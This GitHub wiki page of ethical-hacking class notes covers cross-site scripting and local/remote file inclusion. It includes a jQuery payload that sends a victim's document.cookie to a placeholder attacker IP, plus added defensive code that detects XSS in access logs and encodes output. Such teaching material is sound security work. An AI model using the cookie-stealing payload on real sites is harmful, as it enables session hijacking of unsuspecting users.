Class 10 ‐ XSS & File Inclusion - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki

Client-Side Web Languages

JavaScript

  • JS code can be added to HTML pages.
  • It can affect the page’s behavior.
  • It can manage communication.
  • It can handle events.

JavaScript in HTML Pages

  • Event Handlers: JS events such as onclick can be applied in HTML tags.
  • Script Tags: JS is typically written inside <script> tags.
  • External Files: JavaScript can be loaded from external files via the src attribute of a <script> tag.

Cross-Site Scripting

XSS Overview

  • XSS is a client-side attack.
  • It can affect other users by storing the code.
  • It exploits a vulnerability in a web application.
  • It allows the injection of malicious scripts.

XSS Types

  • Reflected XSS: A payload is sent to the server, which reflects it back in the response based on the payload’s content.
  • Stored XSS: A payload is stored on the server and affects every user who loads the stored content.
  • DOM XSS: A payload executes locally because client-side script writes attacker-controlled data into the Document Object Model.

Reflected XSS

  • A website exposes a user input interface.
  • A request carrying the input is sent to the server for processing.
  • Because of a lack of protection, the input is returned unencoded in the response.

Stored XSS

  • The payload is saved in the database.
  • Every user who views the list is affected.
  • Commonly found on websites with comments or chat features.

DOM XSS

  • Websites print information from their URLs.
  • Even though no input is sent to the server, the DOM can be leveraged for the attack.
  • For the DOM to affect other users, the URL must be sent to them.

Cookies

  • Cookie Value: A string of letters or numbers that verifies, tracks, and stores user information.
  • Cookie Theft: An XSS attack can acquire a cookie to steal a session.

XSS Consequences

  • Defacing
  • Cookie Theft
  • Clickjacking
  • Trojan Delivery

Session Hijacking

Importing jQuery

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  • The tag imports jQuery, a JavaScript library, from the Google CDN.
  • jQuery simplifies common code and contains useful functions.
  • These functions can be used to build custom requests.

Steal the Cookie

<script>$.ajax({url:"http://[attacker's IP]", type:"GET", data:document.cookie})</script>
  • $.ajax(): Allows asynchronous communication
  • url: The address to communicate with
  • type: The HTTP method
  • data: The information that is sent
  • The command retrieves the target’s cookie and sends it to another address using Ajax.
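From the defender's side, the request that carries a payload like the one above lands in the vulnerable site's access log before it ever reaches a victim. The following is an added example, not code from the class wiki: it parses a few constructed access-log lines, URL-decodes the query parameters, and flags the indicators this page discusses (script tags, inline event handlers, and reads of document.cookie). The log lines, the indicator list, and the function names are all constructed for the example.

```javascript
// Added example (not part of the class wiki): flag reflected-XSS probes in
// web server access logs. Sample lines and indicator list are constructed.

// Constructed sample lines in combined log format (IPs are documentation addresses).
const SAMPLE_LOG = [
  '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
  '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=%3Cscript%3E%24.ajax(%7Burl%3A%22http%3A%2F%2F203.0.113.7%22%2Cdata%3Adocument.cookie%7D)%3C%2Fscript%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [10/Oct/2023:13:56:20 +0000] "GET /profile?name=%3Cb%20onclick%3Dalert(1)%3Ehi%3C%2Fb%3E HTTP/1.1" 200 300',
  '10.0.0.2 - - [10/Oct/2023:13:57:00 +0000] "POST /comment HTTP/1.1" 302 0',
];

// Minimal indicator list; a production ruleset would be far broader.
const XSS_INDICATORS = [
  { name: 'script-tag',    re: /<\s*\/?\s*script\b/i },  // <script> or </script>
  { name: 'event-handler', re: /\bon[a-z]+\s*=/i },      // onclick=, onerror=, ...
  { name: 'cookie-access', re: /document\.cookie/i },    // session-theft pattern
];

// Parse one combined-log line into its interesting fields; null if it does not match.
function parseLogLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Return the decoded query parameters of a request target as [name, value] pairs.
function decodedParams(target) {
  const q = target.indexOf('?');
  if (q === -1) return [];
  try {
    return Array.from(new URLSearchParams(target.slice(q + 1)).entries());
  } catch {
    return [];  // malformed encoding: nothing to inspect
  }
}

// Scan lines and report every parameter value that matches at least one indicator.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    for (const [param, value] of decodedParams(entry.target)) {
      const hits = XSS_INDICATORS.filter((i) => i.re.test(value)).map((i) => i.name);
      if (hits.length > 0) {
        findings.push({ ip: entry.ip, path: entry.target.split('?')[0], param, indicators: hits });
      }
    }
  }
  return findings;
}

for (const f of scanAccessLog(SAMPLE_LOG)) {
  console.log(`${f.ip} ${f.path} param=${f.param} indicators=${f.indicators.join(',')}`);
}
```

Decoding before matching matters: the raw log line contains %3Cscript%3E, not <script>, so a pattern applied to the undecoded line would miss it. Request bodies (POST) are not in the access log at all, which is one reason stored XSS is usually caught at the application layer rather than here.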

XSS Mitigations

Means of Protection

  • RegEx: Search patterns, typically used in programming, that can validate or filter input.
  • Htmlspecialchars: Sanitizes data by replacing a small set of dangerous characters, such as <, with their HTML entities.
  • Htmlentities: Sanitizes data by replacing every character that has an HTML entity equivalent with that safe entity.

Htmlentities

  • A webpage is using Htmlentities (or Htmlspecialchars) if the < > " characters in a payload come back as &lt; &gt; &quot; in the response.
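The following is an added example, not code from the class wiki, that ties the reflected and DOM XSS sections to the mitigation above. It emulates PHP's htmlspecialchars() with ENT_QUOTES in JavaScript, shows the vulnerable render (input from the URL concatenated straight into markup) beside the encoded one, and implements the check just described: a probe's < > " must come back as entities. The page, parameter name, and probe string are constructed for the example.

```javascript
// Added example (not from the class wiki): output encoding against reflected
// and DOM-based XSS, emulating PHP htmlspecialchars() with ENT_QUOTES.

// The five characters htmlspecialchars() encodes when ENT_QUOTES is set.
const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };

// & is handled by the same single pass, so already-encoded text is not double-decoded later.
function htmlSpecialChars(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Constructed helper: the "name" query parameter, as a DOM XSS page would read it from location.
function nameFromUrl(url) {
  return new URL(url).searchParams.get('name') || '';
}

// Vulnerable: untrusted input is concatenated into markup unchanged.
function renderUnsafe(name) {
  return `<h1>Hello ${name}</h1>`;
}

// Hardened: same page, input encoded before being placed in an HTML text context.
function renderSafe(name) {
  return `<h1>Hello ${htmlSpecialChars(name)}</h1>`;
}

// The check from the notes: output is encoded if the raw probe is absent and its
// entity-encoded form is present in the response.
function isOutputEncoded(html, probe) {
  return !html.includes(probe) && html.includes(htmlSpecialChars(probe));
}

// Constructed probe and URL to exercise both renders.
const probe = '<b>"x"</b>';
const url = 'https://example.test/greet?name=' + encodeURIComponent(probe);
const name = nameFromUrl(url);
console.log('unsafe :', renderUnsafe(name), '-> encoded?', isOutputEncoded(renderUnsafe(name), probe));
console.log('safe   :', renderSafe(name), '-> encoded?', isOutputEncoded(renderSafe(name), probe));
```

One caveat a practitioner should keep in mind: this encoding is only correct for an HTML text context. Data placed inside an attribute, a URL, or a script block needs the encoder for that context, so the probe check above tells you that text-context output is encoded, not that the page is free of XSS.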

Local File Inclusion

LFI Overview

  • Common in PHP-based websites
  • Leverages the option to include code
  • Uses the include() function
  • Allows the display of sensitive files and data

RFI Overview

  • Remote file inclusion (RFI) is similar to LFI.
  • The included file is fetched from a remote server.
  • The vulnerable application does not validate the remote file it includes.

LFI & RFI Vulnerabilities

  • The include() function allows using data from other PHP files.
  • Can be leveraged for malicious purposes